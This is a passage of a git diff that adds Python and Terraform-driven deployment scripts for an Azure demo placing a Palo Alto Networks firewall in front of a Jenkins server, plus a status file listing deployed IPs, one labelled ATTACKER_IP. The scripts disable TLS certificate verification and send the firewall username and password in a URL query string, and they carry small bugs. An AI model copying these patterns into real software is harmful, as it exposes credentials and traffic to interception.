+ + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +_archive_dir = './WebInDeploy/bootstrap' +_content_update_dir = './WebInDeploy/content_updates/' + +logging.basicConfig(level=logging.INFO) +logger = logging.getLogger() +handler = logging.StreamHandler() +formatter = logging.Formatter('%(levelname)-8s %(message)s') +handler.setFormatter(formatter) +logger.addHandler(handler) + + +# global var to keep status output +status_output = dict() + + +def send_request(call): + + """ + Handles sending requests to API + :param call: url + :return: Retruns result of call. Will return response for codes between 200 and 400. + If 200 response code is required check value in response + """ + headers = {'Accept-Encoding' : 'None', + 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) ' + 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + + try: + r = requests.get(call, headers = headers, verify=False, timeout=5) + r.raise_for_status() + except requests.exceptions.HTTPError as errh: + ''' + Firewall may return 5xx error when rebooting. Need to handle a 5xx response + ''' + logger.debug("DeployRequestException Http Error:") + raise DeployRequestException("Http Error:") + except requests.exceptions.ConnectionError as errc: + logger.debug("DeployRequestException Connection Error:") + raise DeployRequestException("Connection Error") + except requests.exceptions.Timeout as errt: + logger.debug("DeployRequestException Timeout Error:") + raise DeployRequestException("Timeout Error") + except requests.exceptions.RequestException as err: + logger.debug("DeployRequestException RequestException Error:") + raise DeployRequestException("Request Error") + else: + return r + + +class DeployRequestException(Exception): + pass + +def walkdict(dict, match): + """ + Finds a key in a dict or nested dict and returns the value associated with it + :param d: dict or nested dict + :param key: key value + :return: value associated with key + """ + for key, v in dict.items(): + if key == match: + jobid = v + return jobid + elif isinstance(v, OrderedDict): + found = walkdict(v, match) + if found is not None: + return found + + + +def update_fw(fwMgtIP, api_key): + """ + Applies latest AppID, Threat and AV updates to firewall after launch + :param fwMgtIP: Firewall management IP + :param api_key: API key + + """ + # # Download latest applications and threats + + type = "op" + cmd = "" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + getjobid = 0 + jobid = '' + key = 'job' + + # FIXME - Remove Duplicate code for parsing jobid + + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + # FIXME - Remove Duplicate code for showing job status + + completed = 0 + while (completed == 0): + time.sleep(45) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + try: + r = send_request(call) + logger.info('Got Response {} to show jobs '.format(r.text)) + except: + DeployRequestException + logger.debug("failed to get jobid this time. Try again") + else: + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP download Complete ") + completed = 1 + print("Download latest Applications and Threats update") + status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Checking job is complete') + completed = 1 + else: + logger.info('Unable to determine job status') + completed = 1 + + # Install latest content update + type = "op" + cmd = "latestno" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + getjobid = 0 + jobid = '' + key = 'job' + + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + completed = 0 + while (completed == 0): + time.sleep(45) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + try: + r = send_request(call) + logger.info('Got Response {} to show jobs '.format(r.text)) + except: + DeployRequestException + logger.debug("failed to get jobid this time. Try again") + else: + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP Install Complete ") + completed = 1 + print("Install latest Applications and Threats update") + status = "APP+TP Install Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Checking job is complete') + completed = 1 + else: + logger.info('Unable to determine job status') + completed = 1 + + + # Download latest anti-virus update without committing + getjobid = 0 + jobid = '' + type = "op" + cmd = "" + key = 'job' + while getjobid == 0: + try: + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + r = send_request(call) + logger.info('Got response to request AV install {}'.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + completed = 0 + while (completed == 0): + time.sleep(45) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( + fwMgtIP, jobid, api_key) + r = send_request(call) + tree = ET.fromstring(r.text) + logger.debug('Got response for show job {}'.format(r.text)) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.info("AV install Status Complete ") + completed = 1 + else: + status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid)) + completed = 1 + else: + logger.info('Unable to determine job status') + completed = 1 + + +def getApiKey(hostname, username, password): + + """ + Generates a Paloaltonetworks api key from username and password credentials + :param hostname: Ip address of firewall + :param username: + :param password: + :return: api_key API key for firewall + """ + + + call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password) + + api_key = "" + while True: + try: + # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read() + response = send_request(call) + + + except DeployRequestException as updateerr: + logger.info("No response from FW. Wait 20 secs before retry") + time.sleep(10) + continue + + else: + api_key = ET.XML(response.content)[0][0].text + logger.info("FW Management plane is Responding so checking if Dataplane is ready") + logger.debug("Response to get_api is {}".format(response)) + return api_key + + +def getFirewallStatus(fwIP, api_key): + fwip = fwIP + + """ + Gets the firewall status by sending the API request show chassis status. + :param fwMgtIP: IP Address of firewall interface to be probed + :param api_key: Panos API key + """ + + url = "https://%s/api/?type=op&cmd=&key=%s" % (fwip, api_key) + # Send command to fw and see if it times out or we get a response + logger.info("Sending command 'show chassis status' to firewall") + try: + response = requests.get(url, verify=False, timeout=10) + response.raise_for_status() + except requests.exceptions.Timeout as fwdownerr: + logger.debug("No response from FW. So maybe not up!") + return 'no' + # sleep and check again? + except requests.exceptions.HTTPError as fwstartgerr: + ''' + Firewall may return 5xx error when rebooting. Need to handle a 5xx response + raise_for_status() throws HTTPError for error responses + ''' + logger.infor("Http Error: {}: ".format(fwstartgerr)) + return 'cmd_error' + except requests.exceptions.RequestException as err: + logger.debug("Got RequestException response from FW. So maybe not up!") + return 'cmd_error' + else: + logger.debug("Got response to 'show chassis status' {}".format(response)) + + resp_header = ET.fromstring(response.content) + logger.debug('Response header is {}'.format(resp_header)) + + if resp_header.tag != 'response': + logger.debug("Did not get a valid 'response' string...maybe a timeout") + return 'cmd_error' + + if resp_header.attrib['status'] == 'error': + logger.debug("Got an error for the command") + return 'cmd_error' + + if resp_header.attrib['status'] == 'success': + # The fw responded with a successful command execution. So is it ready? + for element in resp_header: + if element.text.rstrip() == 'yes': + logger.info("FW Chassis is ready to accept configuration and connections") + return 'yes' + else: + logger.info("FW Chassis not ready, still waiting for dataplane") + time.sleep(10) + return 'almost' + + +def update_status(key, value): + """ + For tracking purposes. Write responses to file. + :param key: + :param value: + :return: + """ + global status_output + + if type(status_output) is not dict: + logger.info('Creating new status_output object') + status_output = dict() + + if key is not None and value is not None: + status_output[key] = value + + # write status to file to future tracking + write_status_file(status_output) + + +def write_status_file(message_dict): + """ + Writes the deployment state to a dict and outputs to file for status tracking + """ + try: + message_json = json.dumps(message_dict) + with open('deployment_status.json', 'w+') as dpj: + dpj.write(message_json) + + except ValueError as ve: + logger.error('Could not write status file!') + print('Could not write status file!') + sys.exit(1) + + +def create_azure_fileshare(share_prefix, account_name, account_key): + """ + Generate a unique share name to avoid overlaps in shared infra + :param share_prefix: + :param account_name: + :param account_key: + :return: + """ + + # FIXME - Need to remove hardcoded directoty link below + + d_dir = './WebInDeploy/bootstrap' + share_name = "{0}-{1}".format(share_prefix.lower(), str(uuid.uuid4())) + print('using share_name of: {}'.format(share_name)) + + # archive_file_path = _create_archive_directory(files, share_prefix) + + try: + # ignore SSL warnings - bad form, but SSL Decrypt causes issues with this + s = requests.Session() + s.verify = False + + file_service = FileService(account_name=account_name, account_key=account_key, request_session=s) + + # print(file_service) + if not file_service.exists(share_name): + file_service.create_share(share_name) + + for d in ['config', 'content', 'software', 'license']: + print('creating directory of type: {}'.format(d)) + if not file_service.exists(share_name, directory_name=d): + file_service.create_directory(share_name, d) + + # FIXME - We only handle bootstrap files. May need to handle other dirs + + if d == 'config': + for filename in os.listdir(d_dir): + print('creating file: {0}'.format(filename)) + file_service.create_file_from_path(share_name, d, filename, os.path.join(d_dir, filename)) + + except AttributeError as ae: + # this can be returned on bad auth information + print(ae) + return "Authentication or other error creating bootstrap file_share in Azure" + + except AzureException as ahe: + print(ahe) + return str(ahe) + except ValueError as ve: + print(ve) + return str(ve) + + print('all done') + return share_name + + +def getServerStatus(IP): + """ + Gets the server status by sending an HTTP request and checking for a 200 response code + + """ + global gcontext + + call = ("http://" + IP + "/") + logger.info('URL request is {}'.format(call)) + # Send command to fw and see if it times out or we get a response + count = 0 + max_count = 12 + while True: + if count < max_count: + time.sleep(10) + try: + count = count + 1 + r = send_request(call) + except DeployRequestException as e: + logger.debug("Got Invalid response".format(e)) + else: + logger.info('Jenkins Server responded with HTTP 200 code') + return 'server_up' + else: + break + return 'server_down' + + +def apply_tf(working_dir, vars, description): + + """ + Handles terraform operations and returns variables in outputs.tf as a dict. + :param working_dir: Directory that contains the tf files + :param vars: Additional variables passed in to override defaults equivalent to -var + :param description: Description of the deployment for logging purposes + :return: return_code - 0 for success or other for failure + outputs - Dictionary of the terraform outputs defined in the outputs.tf file + + """ + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # Class Terraform uses subprocess and setting capture_output to True will capture output + capture_output = kwargs.pop('capture_output', False) + + if capture_output is True: + stderr = subprocess.PIPE + stdout = subprocess.PIPE + else: + # if capture output is False, then everything will essentially go to stdout and stderrf + stderr = sys.stderr + stdout = sys.stdout + + start_time = time.asctime() + print('Starting Deployment at {}\n'.format(start_time)) + + # Create Bootstrap + + tf = Terraform(working_dir=working_dir) + + tf.cmd('init') + if run_plan: + + # print('Calling tf.plan') + tf.plan(capture_output=False) + + return_code, stdout, stderr = tf.apply(vars = vars, capture_output = capture_output, + skip_plan = True, **kwargs) + outputs = tf.output() + + logger.debug('Got Return code {} for deployment of {}'.format(return_code, description)) + + return (return_code, outputs) + + +def main(username, password, rg_name, azure_region): + + """ + Main function + :param username: + :param password: + :param rg_name: Resource group name prefix + :param azure_region: Region + :return: + """ + username = username + password = password + + WebInBootstrap_vars = { + 'RG_Name': rg_name, + 'Azure_Region': azure_region + } + + WebInDeploy_vars = { + 'Admin_Username': username, + 'Admin_Password': password, + 'Azure_Region': azure_region + } + + WebInFWConf_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # + return_code, outputs = apply_tf('./WebInBootstrap',WebInBootstrap_vars, 'WebInBootstrap') + + if return_code == 0: + share_prefix = 'jenkins-demo' + resource_group = outputs['Resource_Group']['value'] + bootstrap_bucket = outputs['Bootstrap_Bucket']['value'] + storage_account_access_key = outputs['Storage_Account_Access_Key']['value'] + update_status('web_in_bootstrap_status', 'success') + else: + logger.info("WebInBootstrap failed") + update_status('web_in_bootstap_status', 'error') + print(json.dumps(status_output)) + exit(1) + + + share_name = create_azure_fileshare(share_prefix, bootstrap_bucket, storage_account_access_key) + + WebInDeploy_vars.update({'Storage_Account_Access_Key': storage_account_access_key}) + WebInDeploy_vars.update({'Bootstrap_Storage_Account': bootstrap_bucket}) + WebInDeploy_vars.update({'RG_Name': resource_group}) + WebInDeploy_vars.update({'Attack_RG_Name': resource_group}) + WebInDeploy_vars.update({'Storage_Account_Fileshare': share_name}) + + # + # Build Infrastructure + # + # + + + return_code, web_in_deploy_output = apply_tf('./WebInDeploy', WebInDeploy_vars, 'WebInDeploy') + + logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code)) + + + update_status('web_in_deploy_output', web_in_deploy_output) + if return_code == 0: + update_status('web_in_deploy_status', 'success') + albDns = web_in_deploy_output['ALB-DNS']['value'] + fwMgt = web_in_deploy_output['MGT-IP-FW-1']['value'] + nlbDns = web_in_deploy_output['NLB-DNS']['value'] + fwMgtIP = web_in_deploy_output['MGT-IP-FW-1']['value'] + + logger.info("Got these values from output of WebInDeploy \n\n") + logger.info("AppGateway address is {}".format(albDns)) + logger.info("Internal loadbalancer address is {}".format(nlbDns)) + logger.info("Firewall Mgt address is {}".format(fwMgt)) + + else: + logger.info("WebInDeploy failed") + update_status('web_in_deploy_status', 'error') + print(json.dumps(status_output)) + exit(1) + + # + # Check firewall is up and running + # + # + + api_key = getApiKey(fwMgtIP, username, password) + + while True: + err = getFirewallStatus(fwMgtIP, api_key) + if err == 'cmd_error': + logger.info("Command error from fw ") + + elif err == 'no': + logger.info("FW is not up...yet") + # print("FW is not up...yet") + time.sleep(60) + continue + + elif err == 'almost': + logger.info("MGT up waiting for dataplane") + time.sleep(20) + continue + + elif err == 'yes': + logger.info("FW is up") + break + + logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions') + time.sleep(10) + fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password) + + + logger.info("Updating firewall with latest content pack") + update_fw(fwMgtIP, api_key) + + # + # Configure Firewall + # + WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP}) + + logger.info("Applying addtional config to firewall") + + return_code, web_in_fw_conf_out = apply_tf('./WebInFWConf', WebInFWConf_vars, 'WebInFWConf') + + if return_code == 0: + update_status('web_in_fw_conf', 'success') + logger.info("WebInFWConf ok") + + else: + logger.info("WebInFWConf sent return code {}".format(return_code)) + update_status('web_in_deploy_status', 'error') + print(json.dumps(status_output)) + exit(1) + + logger.info("Commit changes to firewall") + + fw.commit() + logger.info("waiting for commit") + time.sleep(60) + logger.info("waiting for commit") + + # + # Check Jenkins + # + + logger.info('Checking if Jenkins Server is ready') + + res = getServerStatus(albDns) + + if res == 'server_up': + logger.info('Jenkins Server is ready') + logger.info('\n\n ### Deployment Complete ###') + logger.info('\n\n Connect to Jenkins Server at http://{}'.format(albDns)) + else: + logger.info('Jenkins Server is down') + logger.info('\n\n ### Deployment Complete ###') + + # dump out status to stdout + print(json.dumps(status_output)) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Get Terraform Params') + parser.add_argument('-u', '--username', help='Firewall Username', required=True) + parser.add_argument('-p', '--password', help='Firewall Password', required=True) + parser.add_argument('-r', '--resource_group', help='Resource Group', required=True) + parser.add_argument('-j', '--azure_region', help='Azure Region', required=True) + + args = parser.parse_args() + username = args.username + password = args.password + resource_group = args.resource_group + azure_region = args.azure_region + + main(username, password, resource_group, azure_region) diff --git a/azure/Jenkins_proj-working/deployment_status.json b/azure/Jenkins_proj-working/deployment_status.json new file mode 100644 index 00000000..96c9a020 --- /dev/null +++ b/azure/Jenkins_proj-working/deployment_status.json @@ -0,0 +1 @@ +{"web_in_bootstrap_status": "success", "web_in_deploy_output": {"ALB-DNS": {"sensitive": false, "type": "string", "value": "with-ngfw-d89a.centralus.cloudapp.azure.com"}, "ATTACKER_IP": {"sensitive": false, "type": "string", "value": "52.165.238.28"}, "Attacker_RG_Name": {"sensitive": false, "type": "string", "value": "pglynn-sf-2e37-7250"}, "MGT-IP-FW-1": {"sensitive": false, "type": "string", "value": "52.165.238.25"}, "NATIVE-DNS": {"sensitive": false, "type": "string", "value": "sans-ngfw-d89a.centralus.cloudapp.azure.com"}, "NLB-DNS": {"sensitive": false, "type": "string", "value": "10.0.4.10"}, "RG_Name": {"sensitive": false, "type": "string", "value": "pglynn-sf-2e37"}}, "web_in_deploy_status": "success", "web_in_fw_conf": "success"} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/deployold.py b/azure/Jenkins_proj-working/deployold.py new file mode 100644 index 00000000..b2ddb37e --- /dev/null +++ b/azure/Jenkins_proj-working/deployold.py @@ -0,0 +1,628 @@ +#!/usr/bin/env python3 +""" +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +# Author: Justin Harris jharris@paloaltonetworks.com + +Usage + +python deploy.py -u -p -r -j + +""" + +import argparse +import json +import logging +import os +import subprocess +import sys +import time +import uuid +import xml.etree.ElementTree as ET +import xmltodict + +import requests +import urllib3 +from azure.common import AzureException +from azure.storage.file import FileService +from pandevice import firewall +from python_terraform import Terraform +from collections import OrderedDict + +# from . import cache_utils +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +_archive_dir = './WebInDeploy/bootstrap' +_content_update_dir = './WebInDeploy/content_updates/' + +logging.basicConfig(level=logging.INFO) +logger = logging.getLogger() +handler = logging.StreamHandler() +formatter = logging.Formatter('%(levelname)-8s %(message)s') +handler.setFormatter(formatter) +logger.addHandler(handler) +logger.setLevel(logging.INFO) + +# global var to keep status output +status_output = dict() + + +def send_request(call): + + headers = {'Accept-Encoding' : 'None', + 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) ' + 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + + try: + r = requests.get(call, headers = headers, verify=False, timeout=5) + r.raise_for_status() + except requests.exceptions.HTTPError as errh: + ''' + Firewall may return 5xx error when rebooting. Need to handle a 5xx response + ''' + logger.debug("DeployRequestException Http Error:") + raise DeployRequestException("Http Error:") + except requests.exceptions.ConnectionError as errc: + logger.debug("DeployRequestException Connection Error:") + raise DeployRequestException("Connection Error") + except requests.exceptions.Timeout as errt: + logger.debug("DeployRequestException Timeout Error:") + raise DeployRequestException("Timeout Error") + except requests.exceptions.RequestException as err: + logger.debug("DeployRequestException RequestException Error:") + raise DeployRequestException("Request Error") + else: + return r + + +class DeployRequestException(Exception): + pass + + +def listRecursive (d, key): + for k, v in d.items (): + if isinstance (v, OrderedDict): + for found in listRecursive (v, key): + yield found + if k == key: + yield v + +def update_fw(fwMgtIP, api_key): + # # Download latest applications and threats + + type = "op" + cmd = "" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + getjobid =0 + jobid = '' + key ='job' + + # FIXME - Remove Duplicate code for parsing jobid + + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + for found in listRecursive(dict, 'job'): + jobid = found + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + # FIXME - Remove Duplicate code for showing job status + + completed = 0 + while (completed == 0): + time.sleep(30) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + try: + r = send_request(call) + logger.info('Got Response {} to show jobs '.format(r.text)) + except: + DeployRequestException + logger.debug("failed to get jobid this time. Try again") + else: + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP download Complete " ) + completed = 1 + print("Download latest Applications and Threats update") + status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid)) + else: + logger.info('Unable to determine job status') + + + # install latest anti-virus update without committing + getjobid =0 + jobid = '' + key ='job' + while getjobid == 0: + try: + + type = "op" + cmd = "latestno" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + r = send_request(call) + logger.info('Got response to request AV install {}'.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + for found in listRecursive(dict, 'job'): + jobid = found + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + completed = 0 + while (completed == 0): + time.sleep(30) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( + fwMgtIP, jobid, api_key) + r = send_request(call) + tree = ET.fromstring(r.text) + + logger.debug('Got response for show job {}'.format(r.text)) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("AV install Status Complete ") + completed = 1 + else: + status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid)) + + else: + logger.info('Unable to determine job status') + + +def getApiKey(hostname, username, password): + ''' + Generate the API key from username / password + ''' + + call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password) + + api_key = "" + while True: + try: + # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read() + response = send_request(call) + + + except DeployRequestException as updateerr: + logger.info("No response from FW. Wait 20 secs before retry") + time.sleep(10) + continue + + else: + api_key = ET.XML(response.content)[0][0].text + logger.info("FW Management plane is Responding so checking if Dataplane is ready") + logger.debug("Response to get_api is {}".format(response)) + return api_key + + +def getFirewallStatus(fwIP, api_key): + fwip = fwIP + + """ + Gets the firewall status by sending the API request show chassis status. + :param fwMgtIP: IP Address of firewall interface to be probed + :param api_key: Panos API key + """ + + url = "https://%s/api/?type=op&cmd=&key=%s" % (fwip, api_key) + # Send command to fw and see if it times out or we get a response + logger.info("Sending command 'show chassis status' to firewall") + try: + response = requests.get(url, verify=False, timeout=10) + response.raise_for_status() + except requests.exceptions.Timeout as fwdownerr: + logger.debug("No response from FW. So maybe not up!") + return 'no' + # sleep and check again? + except requests.exceptions.HTTPError as fwstartgerr: + ''' + Firewall may return 5xx error when rebooting. Need to handle a 5xx response + raise_for_status() throws HTTPError for error responses + ''' + logger.infor("Http Error: {}: ".format(fwstartgerr)) + return 'cmd_error' + except requests.exceptions.RequestException as err: + logger.debug("Got RequestException response from FW. So maybe not up!") + return 'cmd_error' + else: + logger.debug("Got response to 'show chassis status' {}".format(response)) + + resp_header = ET.fromstring(response.content) + logger.debug('Response header is {}'.format(resp_header)) + + if resp_header.tag != 'response': + logger.debug("Did not get a valid 'response' string...maybe a timeout") + return 'cmd_error' + + if resp_header.attrib['status'] == 'error': + logger.debug("Got an error for the command") + return 'cmd_error' + + if resp_header.attrib['status'] == 'success': + # The fw responded with a successful command execution. So is it ready? + for element in resp_header: + if element.text.rstrip() == 'yes': + logger.info("FW Chassis is ready to accept configuration and connections") + return 'yes' + else: + logger.info("FW Chassis not ready, still waiting for dataplane") + time.sleep(10) + return 'almost' + + +def update_status(key, value): + global status_output + + if type(status_output) is not dict: + logger.info('Creating new status_output object') + status_output = dict() + + if key is not None and value is not None: + status_output[key] = value + + # write status to file to future tracking + write_status_file(status_output) + + +def write_status_file(message_dict): + """ + Writes the deployment state to a dict and outputs to file for status tracking + """ + try: + message_json = json.dumps(message_dict) + with open('deployment_status.json', 'w+') as dpj: + dpj.write(message_json) + + except ValueError as ve: + logger.error('Could not write status file!') + print('Could not write status file!') + sys.exit(1) + + +def create_azure_fileshare(share_prefix, account_name, account_key): + # generate a unique share name to avoid overlaps in shared infra + + # FIXME - Need to remove hardcoded directoty link below + + d_dir = './WebInDeploy/bootstrap' + share_name = "{0}-{1}".format(share_prefix.lower(), str(uuid.uuid4())) + print('using share_name of: {}'.format(share_name)) + + # archive_file_path = _create_archive_directory(files, share_prefix) + + try: + # ignore SSL warnings - bad form, but SSL Decrypt causes issues with this + s = requests.Session() + s.verify = False + + file_service = FileService(account_name=account_name, account_key=account_key, request_session=s) + + # print(file_service) + if not file_service.exists(share_name): + file_service.create_share(share_name) + + for d in ['config', 'content', 'software', 'license']: + print('creating directory of type: {}'.format(d)) + if not file_service.exists(share_name, directory_name=d): + file_service.create_directory(share_name, d) + + # FIXME - We only handle bootstrap files. May need to handle other dirs + + if d == 'config': + for filename in os.listdir(d_dir): + print('creating file: {0}'.format(filename)) + file_service.create_file_from_path(share_name, d, filename, os.path.join(d_dir, filename)) + + except AttributeError as ae: + # this can be returned on bad auth information + print(ae) + return "Authentication or other error creating bootstrap file_share in Azure" + + except AzureException as ahe: + print(ahe) + return str(ahe) + except ValueError as ve: + print(ve) + return str(ve) + + print('all done') + return share_name + + +def getServerStatus(IP): + """ + Gets the server status by sending an HTTP request and checking for a 200 response code + """ + global gcontext + + call = ("http://" + IP + "/") + logger.info('URL request is {}'.format(call)) + # Send command to fw and see if it times out or we get a response + count = 0 + max_count = 15 + while True: + if count < max_count: + try: + count = count + 1 + r = send_request(call) + except DeployRequestException as e: + logger.debug("Got Invalid response".format(e)) + else: + logger.info('Jenkins Server responded with HTTP 200 code') + return 'server_up' + else: + break + return 'server_down' + + +def main(username, password, rg_name, azure_region): + username = username + password = password + + WebInBootstrap_vars = { + 'RG_Name': rg_name, + 'Azure_Region': azure_region + } + + WebInDeploy_vars = { + 'Admin_Username': username, + 'Admin_Password': password, + 'Azure_Region': azure_region + } + + WebInFWConf_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # Class Terraform uses subprocess and setting capture_output to True will capture output + capture_output = kwargs.pop('capture_output', False) + + if capture_output is True: + stderr = subprocess.PIPE + stdout = subprocess.PIPE + else: + # if capture output is False, then everything will essentially go to stdout and stderrf + stderr = sys.stderr + stdout = sys.stdout + start_time = time.asctime() + print(f'Starting Deployment at {start_time}\n') + + # Create Bootstrap + + tf = Terraform(working_dir='./WebInBootstrap') + + tf.cmd('init') + if run_plan: + # print('Calling tf.plan') + tf.plan(capture_output=False) + return_code1, stdout, stderr = tf.apply(vars=WebInBootstrap_vars, capture_output=capture_output, + skip_plan=True, **kwargs) + + resource_group = tf.output('Resource_Group') + bootstrap_bucket = tf.output('Bootstrap_Bucket') + storage_account_access_key = tf.output('Storage_Account_Access_Key') + web_in_bootstrap_output = tf.output() + + logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1)) + + update_status('web_in_deploy_stdout', stdout) + update_status('web_in_bootstrap_output', web_in_bootstrap_output) + + if return_code1 != 0: + logger.info("WebInBootstrap failed") + update_status('web_in_bootstap_status', 'error') + update_status('web_in_bootstrap_stderr', stderr) + print(json.dumps(status_output)) + exit(1) + else: + update_status('web_in_bootstrap_status', 'success') + + share_prefix = 'jenkins-demo' + + share_name = create_azure_fileshare(share_prefix, bootstrap_bucket, storage_account_access_key) + + WebInDeploy_vars.update({'Storage_Account_Access_Key': storage_account_access_key}) + WebInDeploy_vars.update({'Bootstrap_Storage_Account': bootstrap_bucket}) + WebInDeploy_vars.update({'RG_Name': resource_group}) + WebInDeploy_vars.update({'Attack_RG_Name': resource_group}) + WebInDeploy_vars.update({'Storage_Account_Fileshare': share_name}) + + # Build Infrastructure + + tf = Terraform(working_dir='./WebInDeploy') + # print("vars {}".format(WebInDeploy_vars)) + tf.cmd('init') + if run_plan: + # print('Calling tf.plan') + tf.plan(capture_output=False, var=WebInDeploy_vars) + + return_code1, stdout, stderr = tf.apply(var=WebInDeploy_vars, capture_output=capture_output, skip_plan=True, + **kwargs) + + web_in_deploy_output = tf.output() + + logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1)) + + update_status('web_in_deploy_stdout', stdout) + update_status('web_in_deploy_output', web_in_deploy_output) + if return_code1 != 0: + logger.info("WebInDeploy failed") + update_status('web_in_deploy_status', 'error') + update_status('web_in_deploy_stderr', stderr) + print(json.dumps(status_output)) + exit(1) + else: + update_status('web_in_deploy_status', 'success') + + albDns = tf.output('ALB-DNS') + fwMgt = 